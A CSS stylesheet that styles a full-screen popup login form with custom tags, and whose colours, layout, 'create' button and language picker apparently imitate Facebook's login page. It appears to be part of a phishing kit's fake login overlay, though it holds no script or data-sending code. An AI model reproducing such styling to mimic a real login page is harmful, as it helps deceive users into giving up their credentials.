@import url('https://fonts.googleapis.com/css2?family=Oswald&family=Roboto&family=Teko&display=swap');

* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Roboto', sans-serif;
}


popup {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    padding: 10px;
    z-index: 99;
    box-shadow: 0 1px 1px black;
    overflow: hidden;
    z-index: 9999999;
}

popup fb {
    position: relative;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: flex-start;
    flex-direction: column;
    box-shadow: 0 0 1000px 1000px rgba(0, 0, 0, 0.60);
    background: #fff;
    height: 100%;
    border-radius: 3px;
    overflow: hidden;
}

[hide] {
    display: none !important;
}

[die] {
    opacity: 0.5 !important;
    pointer-events: none !important;
}

fb err {
    background: #fa3e3e;
    padding: 10px;
    color: #fff;
    font-size: 14px;
}

fb atas {
    position: relative;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: flex-start;
    background: #fffbe2;
    padding: 5px 10px;
}

atas logo {
    position: relative;
    width: 25px;
    height: 37px;
    overflow: hidden;
}

logo img {
    position: absolute;
    top: 4px;
    left: 0;
}

atas text {
    color: #3b5998;
    font-size: 14px;
}

fb fb-text {
    position: relative;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: center;
    margin: 10px 0;
}

fb-text img {
    max-width: 120px;
}

fb form-section {
    position: relative;
    width: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
    justify-content: flex-start;
    padding: 0 15px;
}

form-section form {
    position: relative;
    width: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
    justify-content: flex-start;
    gap: 10px;
}

form ev {
    position: relative;
    width: 100%;
}

ev input {
    position: relative;
    width: 100%;
    padding: 12px 10px;
    background: #f5f6f7;
    border: none;
    border-radius: 3px;
    box-shadow: 0 .3px 2px rgb(133, 133, 133);
    font-size: 14px;
    font-weight: bold;
    outline: none;
    color: rgba(0, 0, 0, 0.70);
}

[pr-20] {
    padding-right: 100px !important;
}

ev reveal {
    position: absolute;
    top: 50%;
    transform: translateY(-50%);
    right: 10px;
    padding: 5px;
    color: #3578e5;
    z-index: 99999;
    font-size: 12px;
    font-weight: bold;
}

ev input::placeholder {
    color: rgba(0, 0, 0, 0.70)
}

ev button {
    position: relative;
    width: 100%;
    color: #fff;
    background: #1877F2;
    border: none;
    outline: none;
    padding: 10px;
    border-radius: 3px;
    font-weight: bold;
    font-size: 16px;
    text-shadow: 0 -.6px 1px black;
    letter-spacing: .5px;
}

form-section forgot {
    color: #216fdb;
    font-size: 14px;
    margin: 10px;
}

form-section or {
    width: 100%;
    position: relative;
    display: flex;
    align-items: center;
    justify-content: center;
    gap: 20px;
    font-size: 14px;
    color: #4b4f56;
    margin: 10px;
}

or hr {
    height: .1px;
    width: 100%;
    background: #ccd0d5
}

fb create {
    position: relative;
    color: #fff;
    background: #00a400;
    border: none;
    outline: none;
    padding: 8px 15px;
    border-radius: 3px;
    font-weight: bold;
    font-size: 14px;
    text-shadow: 0 -.6px 1px rgba(0, 0, 0, 0.60);
}

fb lang {
    position: relative;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: center;
    margin-top: 100px;
}

lang left,
lang right {
    position: relative;
    width: 50%;
    display: flex;
    align-items: center;
    justify-content: flex-start;
    flex-direction: column;
}

lang op.active {
    color: #90949c;
    font-weight: bold;
}


lang left op,
lang right op {
    color: #576b95;
    font-size: 13px;
    margin: 2px 0;
}

lang right ru {
    padding: 0 5px;
    border: 1px solid #576b95;
    border-radius: 3px;
    font-weight: bold;
    color: #90949c;
}

fb copy {
    color: gray;
    font-size: 12px;
    margin: 10px;
}